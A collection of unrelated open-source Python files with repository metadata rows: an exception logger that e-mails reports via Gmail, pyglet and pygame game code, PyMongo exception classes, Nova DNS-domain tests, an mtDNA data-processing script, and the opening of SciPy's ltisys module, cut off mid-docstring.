def _exception(exception_text_array, exception_log_dir, first_occurence, send_email, save_file):
    """Persist (and optionally e-mail) an exception report.

    exception_log_dir is one sub-directory of EXCEPTIONDIR per exception
    type; it is created on the first occurrence.  By default an e-mail is
    sent only on the first occurrence, and a file is written only while the
    directory holds fewer than MAX_SIMILAR_ERRORS_SAVED reports; both can be
    forced on with send_email=True / save_file=True.  Returns the path of
    the report file relative to EXCEPTIONDIR (NOTE: the same path is
    returned even when the file was not actually written).
    """
    if first_occurence:
        os.makedirs(EXCEPTIONDIR + exception_log_dir)
    if (send_email is None and first_occurence) or (send_email == True):
        send_email_notification(_notification_title(exception_log_dir), exception_text_array)
    have_space = len(os.listdir(EXCEPTIONDIR + exception_log_dir)) < MAX_SIMILAR_ERRORS_SAVED
    now = datetime.datetime.now()
    # Microseconds are zero-padded so file names sort chronologically.
    file_name = now.strftime("exception_%Y-%m-%d_%H-%M-%S-") + str(now.microsecond).zfill(6) + ".log"
    if (have_space and save_file is None) or (save_file == True):
        sys.stderr.write("!!! Exception -> " + exception_log_dir + file_name + "\n")
        with open(EXCEPTIONDIR + exception_log_dir + file_name, "w") as myfile:
            myfile.write("\n".join(exception_text_array))
    else:
        sys.stderr.write("!!! Exception (not saved to file) -> " + exception_log_dir + "\n")
    return exception_log_dir + file_name
def exception(dump=None, stdout='', exc_info=None, send_email=None, save_file=None):
    """Log the current (or supplied) exception; return the report path."""
    info = exc_info or sys.exc_info()
    if info is None:
        return None
    dir_name = _formatted_exception_dir_name(info)
    report_lines = _exception_text_array(dump, stdout, info)
    is_first = _exception_log_dir_exists(dir_name)
    return _exception(report_lines, dir_name, is_first, send_email, save_file)
def send_email_notification(subject, body):
    """Send the report lines as a simple HTML e-mail through gmail."""
    html = "<br/>".join(body)
    html = html.replace(' ', '&nbsp;').replace('\n', '<br/>')
    send_through_gmail(subject, html)
def _set_debug_email_failed_flag(exception=None):
    """Persist a marker file recording that the debug e-mail could not be sent.

    NOTE: the parameter name shadows the module-level exception() helper;
    it is kept because callers pass it by keyword (exception=err).
    """
    try:
        with open(DEBUG_EMAIL_FAILED, "w") as flag_file:
            flag_file.write(str(exception))
    except Exception as err:
        # Last resort: we cannot even write the flag file, so dump to stdout.
        # "except ... as" and print() keep this valid on Python 2.6+ and 3.
        print(exception)
        print(err)
def send_through_gmail(subject, body):
    """E-mail *body* (HTML) to the configured debug address via gmail SMTP.

    Credentials and recipient come from the module-level config.  Any
    failure other than "Connection refused" (taken to mean the network is
    simply unavailable) is recorded via _set_debug_email_failed_flag().
    """
    try:
        smtpserver = smtplib.SMTP("smtp.gmail.com", 587, timeout=10)
        smtpserver.ehlo()
        smtpserver.starttls()
        smtpserver.login(config.get('gmail', 'email'), config.get('gmail', 'password'))
        email_message_html = body
        msg = MIMEMultipart('alternative')
        msg['Subject'] = subject
        msg['From'] = "Vincent Python <%s>" % config.get('gmail', 'email')
        msg['To'] = "%s <%s>" % ('awesome hackers', config.get('environment', 'debug_email'))
        # Record the MIME types of both parts - text/plain and text/html.
        part1 = MIMEText(email_message_html, 'plain')
        part2 = MIMEText(email_message_html, 'html')
        msg.attach(part1)
        msg.attach(part2)
        smtpserver.sendmail(msg['From'], msg['To'], msg.as_string())
        smtpserver.close()
    except Exception as err:  # Py2.6+/Py3-compatible (was "except Exception, err:")
        if 'Connection refused' not in str(err):  # it was just internet not available
            _set_debug_email_failed_flag(exception=err)
class ThreadStdout:
    """stdout replacement that captures writes made by worker threads.

    Output from the main thread passes straight through to the real stdout;
    output from any other thread is accumulated per thread id so it can be
    attached to that thread's exception report.  Uses the Python 2 `thread`
    module (threading.get_ident() is the Python 3 equivalent).
    """
    def __init__(self):
        self.thread_specific_outputs = {}  # thread id -> accumulated text
        self.MAIN_THREAD = thread.get_ident()
    def write(self, value):
        if thread.get_ident() != self.MAIN_THREAD: # put all children threads stdouts into a separate storage
            if thread.get_ident() not in self.thread_specific_outputs:
                self.thread_specific_outputs[thread.get_ident()] = value
            else:
                self.thread_specific_outputs[thread.get_ident()] += value
        else: # print all main thread stdouts the normal way
            sys.__stdout__.write(value)
    def flush(self):
        # Delegate to the real stdout so buffering behaves as expected.
        sys.__stdout__.flush()
    def clean(self):
        # Drop the calling thread's captured output, if any.
        if thread.get_ident() in self.thread_specific_outputs:
            del self.thread_specific_outputs[thread.get_ident()]
    def get(self):
        # Raises KeyError when the calling thread has produced no output.
        return self.thread_specific_outputs[thread.get_ident()]
| bsd-3-clause |
theblacklion/pyglet | contrib/scene2d/examples/text_wrap.py | 29 | 1069 | #!/usr/bin/env python
'''Example of simple text wrapping without using layout.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from pyglet.gl import *
from pyglet.window import Window
from pyglet.window import key
from pyglet import clock
from pyglet import font
from scene2d.textsprite import *
window = Window(visible=False, resizable=True)  # shown later, after setup
arial = font.load('Arial', 24)  # typeface used for the demo text
text = 'Type away... '  # initial contents of the text sprite
@window.event
def on_resize(width, height):
    # Re-wrap the sprite to the new window width; keep a 10px left margin.
    sprite.width = width
    sprite.x = 10
@window.event
def on_text(text):
    # Append typed characters, translating carriage returns to newlines.
    sprite.text += text.replace('\r', '\n')
@window.event
def on_key_press(symbol, modifiers):
    # Backspace deletes the last character of the sprite text.
    if symbol == key.BACKSPACE:
        sprite.text = sprite.text[:-1]
sprite = TextSprite(arial, text, color=(0, 0, 0, 1))  # black text
fps = clock.ClockDisplay()
window.push_handlers(fps)
glClearColor(1, 1, 1, 1)  # white background
window.set_visible()
# Manual event/draw loop: poll events, tick the clock, redraw each frame.
while not window.has_exit:
    window.dispatch_events()
    clock.tick()
    glClear(GL_COLOR_BUFFER_BIT)
    sprite.y = sprite.height # TODO align on bottom
    sprite.draw()
    fps.draw()
    window.flip()
| bsd-3-clause |
JulianH99/pygame2017 | Mundo/Escenario.py | 1 | 13586 | import sys as s
from math import floor
from pygame import *
from pygame.locals import *
from random import randint
from Obstaculo import *
from Laser import *
# Scenario class: scrolling background, platforms and obstacle management.
class Escenario():
    # Orientation constants (left-to-right, right-to-left, normal/inverted gravity).
    ORIENT_IZQ_DER = 0
    ORIENT_DER_IZQ = 1
    ORIENT_G_NOR = 2
    ORIENT_G_INVER = 3
    # Background images, loaded once at class-definition time.
    FONDOS={'NORMAL': image.load("Imagenes/fondoMovil1.png"),
            'OBSTACULO': image.load("Imagenes/fondoObstaculo.png"),
            'POWERUP_BUENO': image.load("Imagenes/fondoPowerupBueno.png"),
            'POWERUP_MALO': image.load("Imagenes/fondoPowerupMalo.png"),
            'AUMENTO_VELOCIDAD': image.load("Imagenes/fondoVelocidad.png"),
            'PUNTAJE': image.load("Imagenes/fondoPuntaje.png")
            }

    def __init__(self, velocidad, velocidadFondo, orientacion, ventana, ancho, alto):
        """Build the scenario for a window of size ancho x alto."""
        self.ancho = ancho  # window width
        self.alto = alto  # window height
        self.velocidadFondo = velocidadFondo  # background scroll speed
        self.velocidad = velocidad  # speed of the scenario and its obstacles
        self.dirVel = 1  # speed direction (+1 or -1, see __cambiarOrientacion)
        self.fondo = [self.FONDOS['NORMAL'], self.FONDOS['NORMAL']]  # two copies for seamless scrolling
        self.orientacion = orientacion  # current scroll orientation
        self.obstaculos = []  # obstacles currently alive
        self.rect = [self.fondo[0].get_rect(), self.fondo[1].get_rect()]
        self.rect[0].left = 0
        self.rect[0].top = 0
        self.rect[1].left = ancho  # second copy starts one screen to the right
        self.rect[1].top = 0
        # Bottom platform (two copies, scrolled like the background).
        self.plataforma = [image.load("Imagenes/plataformaA.png"), image.load("Imagenes/plataformaA.png")]
        self.rectPlataforma = [self.plataforma[0].get_rect(), self.plataforma[1].get_rect()]
        self.rectPlataforma[0].left = 0
        self.rectPlataforma[0].bottom = alto-50
        self.rectPlataforma[1].left = ancho
        self.rectPlataforma[1].bottom = alto-50
        # Top platform (two copies).
        self.plataformaA = [image.load("Imagenes/plataforma.png"), image.load("Imagenes/plataforma.png")]
        self.rectPlataformaA = [self.plataformaA[0].get_rect(), self.plataformaA[1].get_rect()]
        self.rectPlataformaA[0].left = 0
        self.rectPlataformaA[0].top = 0
        self.rectPlataformaA[1].left = ancho
        self.rectPlataformaA[1].top = 0
        self.posX = 0  # x position where new obstacles spawn
        self.ventana = ventana  # surface the scenario is drawn on
        self.__aux1 = 0  # last tick the speed was increased
        self.__aux2 = 0  # last tick an obstacle was spawned
        self.__auxTiempoFondo = 0
        self.__cont = 0  # debounce counter for collision sounds

    # Random obstacle generator. `puntaje` is currently unused but kept
    # for interface compatibility with callers.
    def generarObstaculos(self, puntaje, tiempo):
        self.tiempo = tiempo
        self.__cambiarOrientacion()
        # Speed increases every 300 ticks (dirVel**2 is always 1).
        if tiempo != self.__aux1 and tiempo % 300 == 0:
            self.__aux1 = tiempo
            self.velocidad += (self.dirVel*self.dirVel)
            trueno = mixer.Sound("Sonidos/rayo.wav")
            trueno.play()
            self.cambiarFondo(self.FONDOS['AUMENTO_VELOCIDAD'])
        # Spawn attempt at randomized intervals.
        r = randint(20, 70)
        if tiempo != self.__aux2 and tiempo % r == 0:
            self.__aux2 = tiempo
            listObstaculos = []
            o = randint(0, 2)  # which candidate to actually spawn
            arriba = randint(0, 1)  # 0 = attach to top platform, 1 = bottom
            # Laser candidate.
            laser = Laser("Imagenes/laserA.png", "Imagenes/laserD.png", self.posX, 311, -10, "Sonidos/laser.wav")
            listObstaculos.append(laser)
            # Wall candidate.
            if arriba == 0:
                posY = 40 + self.rectPlataformaA[0].height
            else:
                posY = self.alto - 40 - self.rectPlataforma[0].height
            pared = Obstaculo("Imagenes/pared.png", self.posX, posY, Obstaculo.PARED, "Sonidos/pared.wav")
            listObstaculos.append(pared)
            # Spikes candidate.
            if arriba == 0:
                posY = 23 + self.rectPlataformaA[0].height
                puas = Obstaculo("Imagenes/puasA.png", self.posX, posY, Obstaculo.PUAS, "Sonidos/shoot.wav")
            else:
                posY = self.alto - 23 - self.rectPlataforma[0].height
                puas = Obstaculo("Imagenes/puas1.png", self.posX, posY, Obstaculo.PUAS, "Sonidos/shoot.wav")
            listObstaculos.append(puas)
            # Only spawn if it does not overlap the previously spawned obstacle.
            if self.__verificiacionObstaculos(listObstaculos[o]):
                self.obstaculos.append(listObstaculos[o])

    # Check spacing between the candidate and the last spawned obstacle.
    def __verificiacionObstaculos(self, obstaculo):
        if not self.obstaculos:
            return True
        ultimo = self.obstaculos[-1]
        # BUGFIX: the original compared ultimo.rect.top with itself (always
        # True); compare against the candidate obstacle instead.
        misma_altura = ultimo.rect.top == obstaculo.rect.top
        solapa = (ultimo.rect.left <= obstaculo.rect.left <= ultimo.rect.right or
                  ultimo.rect.left <= obstaculo.rect.right <= ultimo.rect.right)
        return not (misma_altura and solapa)

    # Move, animate and draw every obstacle.
    def movimientoObstaculos(self):
        self.__cambiarOrientacion()
        for obstaculo in self.obstaculos:
            if type(obstaculo) is Laser:
                # Lasers toggle: on every 15 ticks, off every 3 ticks.
                if self.tiempo % 15 == 0:
                    obstaculo.activar(True)
                elif self.tiempo % 3 == 0:
                    obstaculo.activar(False)
            obstaculo.mover(self.velocidad*self.dirVel)
            obstaculo.dibujar(self.ventana)

    # Remove obstacles that scrolled out of the visible area.
    def removerObstaculo(self):
        # BUGFIX: the original removed elements from the list while
        # iterating it, which can skip obstacles; rebuild the list instead.
        if self.ORIENT_IZQ_DER == self.orientacion:
            self.obstaculos = [o for o in self.obstaculos if o.rect.left <= self.ancho]
        else:
            self.obstaculos = [o for o in self.obstaculos if o.rect.right >= 0]

    # Collision test between the ball rect and the obstacles; returns the
    # damage value of the hit obstacle (0 when there is no damaging hit).
    def colisionBolita(self, rect):
        i = rect.collidelist(self.obstaculos)  # hoisted: computed once
        if i != -1:
            if type(self.obstaculos[i]) is not Laser:
                self.cambiarFondo(self.FONDOS['OBSTACULO'])
            if type(self.obstaculos[i]) is Laser:
                if self.obstaculos[i].activo:
                    # Active laser: flash the obstacle background and damage.
                    self.cambiarFondo(self.FONDOS['OBSTACULO'])
                    self.obstaculos[i].sonido.play()
                    return self.obstaculos[i].getValorDanio()
                else:
                    # Inactive laser is harmless.
                    self.cambiarFondo(self.FONDOS['NORMAL'])
                    return 0
            else:
                # Play the hit sound only once per continuous contact.
                if self.__cont < 1:
                    self.obstaculos[i].sonido.play()
                    self.__cont += 1
                return self.obstaculos[i].getValorDanio()
        else:
            self.cambiarFondo(self.FONDOS['NORMAL'])
            self.__cont = 0
            return 0

    # Draw the (two-copy) scrolling background and platforms.
    def dibujarFondo(self, ventana):
        ventana.blit(self.fondo[0], self.rect[0])
        ventana.blit(self.fondo[1], self.rect[1])
        # Platforms.
        ventana.blit(self.plataforma[0], self.rectPlataforma[0])
        ventana.blit(self.plataforma[1], self.rectPlataforma[1])
        #ventana.blit(self.plataformaA[0], self.rectPlataformaA[0])
        #ventana.blit(self.plataformaA[1], self.rectPlataformaA[1])

    # Scroll the background and platforms.
    def moverFondo(self):
        self.__cambiarOrientacion()
        self.__restriccionFondo(self.rect)
        self.__restriccionPlataforma(self.rectPlataforma, self.rectPlataformaA)
        # Background copies.
        self.rect[0].left -= (self.velocidadFondo*self.dirVel)
        self.rect[1].left -= (self.velocidadFondo*self.dirVel)
        # Platform copies (scroll at obstacle speed, not background speed).
        self.rectPlataforma[1].left -= int(self.velocidad*self.dirVel)
        self.rectPlataforma[0].left -= int(self.velocidad*self.dirVel)
        self.rectPlataformaA[1].left -= int(self.velocidad*self.dirVel)
        self.rectPlataformaA[0].left -= int(self.velocidad*self.dirVel)

    # Wrap the background copies to achieve infinite scrolling.
    def __restriccionFondo(self, fondoRect):
        if self.ORIENT_IZQ_DER == self.orientacion:
            if fondoRect[0].right == self.ancho:
                fondoRect[1].right = self.velocidadFondo
            elif fondoRect[1].right == self.ancho:
                fondoRect[0].right = self.velocidadFondo
        else:
            if fondoRect[0].left == -self.velocidadFondo:
                fondoRect[1].left = self.ancho - self.velocidadFondo
            elif fondoRect[1].left == -self.velocidadFondo:
                fondoRect[0].left = self.ancho - self.velocidadFondo

    # Wrap the platform copies to achieve infinite scrolling.
    def __restriccionPlataforma(self, fondoRect, rect2):
        if self.ORIENT_IZQ_DER == self.orientacion:
            if fondoRect[0].left > self.ancho:
                # Bottom platform.
                fondoRect[0].right = 0
                fondoRect[1].left = fondoRect[0].right
                # Top platform.
                rect2[0].right = 0
                rect2[1].left = rect2[0].right
            elif fondoRect[1].left > self.ancho:
                # Bottom platform.
                fondoRect[1].right = 0
                fondoRect[0].left = fondoRect[1].right
                # Top platform.
                rect2[1].left = int(self.ancho - (self.velocidad*self.dirVel))
                rect2[0].right = rect2[1].left
                rect2[1].right = 0
                rect2[0].left = rect2[1].right
        else:
            if fondoRect[0].right < 0:
                # Bottom platform.
                fondoRect[0].left = int(self.ancho - (self.velocidad * self.dirVel))
                fondoRect[1].right = fondoRect[0].left
                # Top platform.
                rect2[0].left = int(self.ancho - (self.velocidad * self.dirVel))
                rect2[1].right = rect2[0].left
            elif fondoRect[1].right < 0:
                # Bottom platform.
                fondoRect[1].left = int(self.ancho - (self.velocidad * self.dirVel))
                fondoRect[0].right = fondoRect[1].left
                # Top platform.
                rect2[1].left = int(self.ancho - (self.velocidad * self.dirVel))
                rect2[0].right = rect2[1].left

    # Update the movement direction and spawn position for the orientation.
    def __cambiarOrientacion(self):
        if self.orientacion == self.ORIENT_IZQ_DER:
            self.dirVel = -1
            self.posX = 0
        else:
            self.dirVel = 1
            self.posX = self.ancho

    # Swap both background copies for the given image.
    def cambiarFondo(self, fondo):
        self.fondo[0] = fondo
        self.fondo[1] = fondo

    # Set every obstacle's damage to 0.
    def sinDanio(self):
        # BUGFIX: the original called sinDanio() on the list itself.
        for obstaculo in self.obstaculos:
            obstaculo.sinDanio()

    # Restore every obstacle's damage.
    def restablecerDanio(self):
        # BUGFIX: the original called restablecerDanio() on the list itself.
        for obstaculo in self.obstaculos:
            obstaculo.restablecerDanio()

    # Accessors kept for interface compatibility.
    def getVelocidad(self):
        return self.velocidad

    def setVelocidad(self, velocidad):
        self.velocidad = velocidad

    def getOrientacion(self):
        return self.orientacion

    def setOrientacion(self, orientacion):
        self.orientacion = orientacion
| gpl-3.0 |
couchbaselabs/litmus | lib/pymongo/errors.py | 3 | 2626 | # Copyright 2009-2010 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exceptions raised by PyMongo."""
from bson.errors import *
class PyMongoError(Exception):
    """Root of the PyMongo exception hierarchy; catching this type
    catches every error raised by the driver.

    .. versionadded:: 1.4
    """
class ConnectionFailure(PyMongoError):
    """Raised when a connection to the database cannot be made or is lost."""
class AutoReconnect(ConnectionFailure):
    """Raised when a connection is lost and an auto-reconnect will be tried.

    Handle this exception knowing that the operation which caused it has
    not necessarily succeeded. Future operations attempt to open a new
    connection to the database (and keep raising this exception until the
    first successful connection is made).
    """
class ConfigurationError(PyMongoError):
    """Raised when something is incorrectly configured."""
class OperationFailure(PyMongoError):
    """Raised when a database operation fails.

    .. versionadded:: 1.8
       The :attr:`code` attribute.
    """

    def __init__(self, error, code=None):
        super(OperationFailure, self).__init__(error)
        # Server-supplied error code, kept so callers can inspect it.
        self.code = code
class TimeoutError(OperationFailure):
    """Raised when a database operation times out.

    NOTE: shadows the :exc:`TimeoutError` builtin (Python 3); kept for
    backwards compatibility of the public API.

    .. versionadded:: 1.8
    """
class DuplicateKeyError(OperationFailure):
    """Raised when a safe insert or update hits a duplicate key error.

    .. note:: Requires server version **>= 1.3.0**

    .. versionadded:: 1.4
    """
class InvalidOperation(PyMongoError):
    """Raised when a client attempts an invalid operation."""
class InvalidName(PyMongoError):
    """Raised when an invalid name is used."""
class CollectionInvalid(PyMongoError):
    """Raised when collection validation fails."""
class InvalidURI(ConfigurationError):
    """Raised when an invalid mongodb URI is parsed.

    .. versionadded:: 1.5
    """
class UnsupportedOption(ConfigurationError):
    """Raised for options the driver does not support.

    .. versionadded:: 2.0
    """
| apache-2.0 |
felixma/nova | nova/tests/unit/objects/test_dns_domain.py | 70 | 3002 | # Copyright (C) 2014, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova import db
from nova.objects import dns_domain
from nova.tests.unit.objects import test_objects
# Canned dnsdomain DB row; returned by the mocked `db.dnsdomain_get` /
# `db.dnsdomain_get_all` calls in the tests below.
fake_dnsd = {
    'created_at': None,
    'updated_at': None,
    'deleted_at': None,
    'deleted': 0,
    'domain': 'blah.example.com',
    'scope': 'private',
    'availability_zone': 'overthere',
    'project_id': '867530niner',
}
class _TestDNSDomain(object):
    """Shared DNSDomain test cases, mixed into local and remote variants."""

    @staticmethod
    def _compare(test, expected, obj):
        """Assert that ``obj`` carries every field/value of ``expected``."""
        # Fix: the original loop ignored the unpacked value and re-indexed
        # the dict, and its parameter name shadowed the imported `db` module.
        for field, value in expected.items():
            test.assertEqual(value, obj[field])

    def test_get_by_domain(self):
        with mock.patch.object(db, 'dnsdomain_get') as get:
            get.return_value = fake_dnsd
            dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
            self._compare(self, fake_dnsd, dnsd)

    def test_register_for_zone(self):
        dns_domain.DNSDomain.register_for_zone(self.context.elevated(),
                                               'domain', 'zone')
        dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
        self.assertEqual('domain', dnsd.domain)
        self.assertEqual('zone', dnsd.availability_zone)

    def test_register_for_project(self):
        dns_domain.DNSDomain.register_for_project(self.context.elevated(),
                                                  'domain', 'project')
        dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
        self.assertEqual('domain', dnsd.domain)
        self.assertEqual('project', dnsd.project_id)

    def test_delete_by_domain(self):
        # Register, verify presence, delete, then verify absence.
        dns_domain.DNSDomain.register_for_zone(self.context.elevated(),
                                               'domain', 'zone')
        dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
        self.assertEqual('domain', dnsd.domain)
        self.assertEqual('zone', dnsd.availability_zone)

        dns_domain.DNSDomain.delete_by_domain(self.context.elevated(),
                                              'domain')
        dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
        self.assertIsNone(dnsd)

    def test_get_all(self):
        with mock.patch.object(db, 'dnsdomain_get_all') as get:
            get.return_value = [fake_dnsd]
            dns_domain.DNSDomainList.get_all(self.context)
class TestDNSDomainObject(test_objects._LocalTest,
                          _TestDNSDomain):
    # Runs the shared _TestDNSDomain cases against the local (in-process)
    # object backend.
    pass
class TestRemoteDNSDomainObject(test_objects._RemoteTest,
                                _TestDNSDomain):
    # Runs the same shared cases through the remote (RPC-serialized) backend.
    pass
| apache-2.0 |
ryanraaum/african-mtdna | popdata_sources/lippold2014/process.py | 1 | 1543 | from oldowan.mtconvert import seq2sites, sites2seq, str2sites
from oldowan.fasta import fasta
from string import translate
import pandas as pd
import sys
sys.path.append('../../scripts')
from utils import *
# NOTE: Python 2 script (print statement, `string.translate`, pandas `.ix`).
## load metadata
metadata = pd.read_csv('metadata.csv', index_col=0)
region = range2region(metadata.ix[0, 'SeqRange'])
## load sample info
sinfo = pd.read_csv('HGDP_info.csv', index_col=0)
# Normalize sample IDs to the zero-padded 'HGDP#####' form and re-key on it.
newindices = ['HGDP' + str(x).zfill(5) for x in sinfo.index]
sinfo['hgdpid'] = newindices
sinfo = sinfo.set_index('hgdpid')
# Read all fasta entries; HGDP id is the 5th whitespace-separated token of
# each entry name, and each sequence is converted to variant sites.
ff = fasta('hgdp_africa.fasta', 'r')
data = ff.readentries()
ff.close()
hids = []
sites = []
for entry in data:
    words = entry['name'].split()
    hids.append(words[4])
    sites.append(seq2sites(entry['sequence']))
# three sequences have an 'N' at around 309 that breaks validation
# this will be treated as a heteroplasy of the T there and ignored
skip = [64, 67, 73]
# validate: round-trip sites back to a sequence (dashes stripped) and
# require it to match the original; any mismatch aborts the export below.
passed_validation = True
for i in range(len(sites)):
    if i not in skip:
        seq1 = data[i]['sequence'].upper()
        if not seq1 == translate(sites2seq(sites[i], region), None, '-'):
            passed_validation = False
            print i, hids[i]
# Per-population counter used to build sequential sample IDs.
counter = {}
for k in metadata.index:
    counter[k] = 0
if passed_validation:
    with open('processed.csv', 'w') as f:
        for i in range(len(sites)):
            hid = hids[i]
            key = sinfo.ix[hid,'PopulationName']
            prefix = metadata.ix[key,'NewPrefix']
            counter[key] += 1
            newid = prefix + str(counter[key]).zfill(3)
            mysites = ' '.join([str(x) for x in sites[i]])
            f.write('%s,%s,%s\n' % (newid, hid, mysites))
mbayon/TFG-MachineLearning | venv/lib/python3.6/site-packages/scipy/signal/ltisys.py | 7 | 116413 | """
ltisys -- a collection of classes and functions for modeling linear
time invariant systems.
"""
from __future__ import division, print_function, absolute_import
#
# Author: Travis Oliphant 2001
#
# Feb 2010: Warren Weckesser
# Rewrote lsim2 and added impulse2.
# Apr 2011: Jeffrey Armstrong <jeff@approximatrix.com>
# Added dlsim, dstep, dimpulse, cont2discrete
# Aug 2013: Juan Luis Cano
# Rewrote abcd_normalize.
# Jan 2015: Irvin Probst irvin DOT probst AT ensta-bretagne DOT fr
# Added pole placement
# Mar 2015: Clancy Rowley
# Rewrote lsim
# May 2015: Felix Berkenkamp
# Split lti class into subclasses
# Merged discrete systems and added dlti
import warnings
# np.linalg.qr fails on some tests with LinAlgError: zgeqrf returns -7
# use scipy's qr until this is solved
from scipy.linalg import qr as s_qr
from scipy import integrate, interpolate, linalg
from scipy.interpolate import interp1d
from scipy._lib.six import xrange
from .filter_design import (tf2zpk, zpk2tf, normalize, freqs, freqz, freqs_zpk,
freqz_zpk)
from .lti_conversion import (tf2ss, abcd_normalize, ss2tf, zpk2ss, ss2zpk,
cont2discrete)
import numpy
import numpy as np
from numpy import (real, atleast_1d, atleast_2d, squeeze, asarray, zeros,
dot, transpose, ones, zeros_like, linspace, nan_to_num)
import copy
__all__ = ['lti', 'dlti', 'TransferFunction', 'ZerosPolesGain', 'StateSpace',
'lsim', 'lsim2', 'impulse', 'impulse2', 'step', 'step2', 'bode',
'freqresp', 'place_poles', 'dlsim', 'dstep', 'dimpulse',
'dfreqresp', 'dbode']
class LinearTimeInvariant(object):
    # Common base for `lti` (continuous) and `dlti` (discrete) systems;
    # stores dimensions / sampling time and provides conversion helpers.

    def __new__(cls, *system, **kwargs):
        """Create a new object, don't allow direct instances."""
        if cls is LinearTimeInvariant:
            raise NotImplementedError('The LinearTimeInvariant class is not '
                                      'meant to be used directly, use `lti` '
                                      'or `dlti` instead.')
        return super(LinearTimeInvariant, cls).__new__(cls)

    def __init__(self):
        """
        Initialize the `lti` baseclass.

        The heavy lifting is done by the subclasses.
        """
        super(LinearTimeInvariant, self).__init__()
        self.inputs = None
        self.outputs = None
        self._dt = None  # None marks a continuous-time system

    @property
    def dt(self):
        """Return the sampling time of the system, `None` for `lti` systems."""
        return self._dt

    @property
    def _dt_dict(self):
        # Keyword dict forwarded when constructing converted systems; empty
        # for continuous-time so the continuous subclass is chosen.
        if self.dt is None:
            return {}
        else:
            return {'dt': self.dt}

    @property
    def zeros(self):
        """Zeros of the system."""
        return self.to_zpk().zeros

    @property
    def poles(self):
        """Poles of the system."""
        return self.to_zpk().poles

    def _as_ss(self):
        """Convert to `StateSpace` system, without copying.

        Returns
        -------
        sys: StateSpace
            The `StateSpace` system. If the class is already an instance of
            `StateSpace` then this instance is returned.
        """
        if isinstance(self, StateSpace):
            return self
        else:
            return self.to_ss()

    def _as_zpk(self):
        """Convert to `ZerosPolesGain` system, without copying.

        Returns
        -------
        sys: ZerosPolesGain
            The `ZerosPolesGain` system. If the class is already an instance of
            `ZerosPolesGain` then this instance is returned.
        """
        if isinstance(self, ZerosPolesGain):
            return self
        else:
            return self.to_zpk()

    def _as_tf(self):
        """Convert to `TransferFunction` system, without copying.

        Returns
        -------
        sys: TransferFunction
            The `TransferFunction` system. If the class is already an instance
            of `TransferFunction` then this instance is returned.
        """
        if isinstance(self, TransferFunction):
            return self
        else:
            return self.to_tf()
class lti(LinearTimeInvariant):
    """
    Continuous-time linear time invariant system base class.

    Parameters
    ----------
    *system : arguments
        The `lti` class can be instantiated with either 2, 3 or 4 arguments.
        The following gives the number of arguments and the corresponding
        continuous-time subclass that is created:

        * 2: `TransferFunction`: (numerator, denominator)
        * 3: `ZerosPolesGain`: (zeros, poles, gain)
        * 4: `StateSpace`: (A, B, C, D)

        Each argument can be an array or a sequence.

    See Also
    --------
    ZerosPolesGain, StateSpace, TransferFunction, dlti

    Notes
    -----
    `lti` instances do not exist directly. Instead, `lti` creates an instance
    of one of its subclasses: `StateSpace`, `TransferFunction` or
    `ZerosPolesGain`.

    If (numerator, denominator) is passed in for ``*system``, coefficients for
    both the numerator and denominator should be specified in descending
    exponent order (e.g., ``s^2 + 3s + 5`` would be represented as ``[1, 3,
    5]``).

    Changing the value of properties that are not directly part of the current
    system representation (such as the `zeros` of a `StateSpace` system) is
    very inefficient and may lead to numerical inaccuracies. It is better to
    convert to the specific system representation first. For example, call
    ``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.

    Examples
    --------
    >>> from scipy import signal

    >>> signal.lti(1, 2, 3, 4)
    StateSpaceContinuous(
    array([[1]]),
    array([[2]]),
    array([[3]]),
    array([[4]]),
    dt: None
    )

    >>> signal.lti([1, 2], [3, 4], 5)
    ZerosPolesGainContinuous(
    array([1, 2]),
    array([3, 4]),
    5,
    dt: None
    )

    >>> signal.lti([3, 4], [1, 2])
    TransferFunctionContinuous(
    array([ 3.,  4.]),
    array([ 1.,  2.]),
    dt: None
    )
    """

    def __new__(cls, *system):
        """Create an instance of the appropriate subclass."""
        # Dispatch on argument count: 2 -> tf, 3 -> zpk, 4 -> state space.
        if cls is lti:
            N = len(system)
            if N == 2:
                return TransferFunctionContinuous.__new__(
                    TransferFunctionContinuous, *system)
            elif N == 3:
                return ZerosPolesGainContinuous.__new__(
                    ZerosPolesGainContinuous, *system)
            elif N == 4:
                return StateSpaceContinuous.__new__(StateSpaceContinuous,
                                                    *system)
            else:
                raise ValueError("`system` needs to be an instance of `lti` "
                                 "or have 2, 3 or 4 arguments.")
        # __new__ was called from a subclass, let it call its own functions
        return super(lti, cls).__new__(cls)

    def __init__(self, *system):
        """
        Initialize the `lti` baseclass.

        The heavy lifting is done by the subclasses.
        """
        super(lti, self).__init__(*system)

    def impulse(self, X0=None, T=None, N=None):
        """
        Return the impulse response of a continuous-time system.
        See `impulse` for details.
        """
        return impulse(self, X0=X0, T=T, N=N)

    def step(self, X0=None, T=None, N=None):
        """
        Return the step response of a continuous-time system.
        See `step` for details.
        """
        return step(self, X0=X0, T=T, N=N)

    def output(self, U, T, X0=None):
        """
        Return the response of a continuous-time system to input `U`.
        See `lsim` for details.
        """
        return lsim(self, U, T, X0=X0)

    def bode(self, w=None, n=100):
        """
        Calculate Bode magnitude and phase data of a continuous-time system.

        Returns a 3-tuple containing arrays of frequencies [rad/s], magnitude
        [dB] and phase [deg]. See `bode` for details.

        Examples
        --------
        >>> from scipy import signal
        >>> import matplotlib.pyplot as plt

        >>> sys = signal.TransferFunction([1], [1, 1])
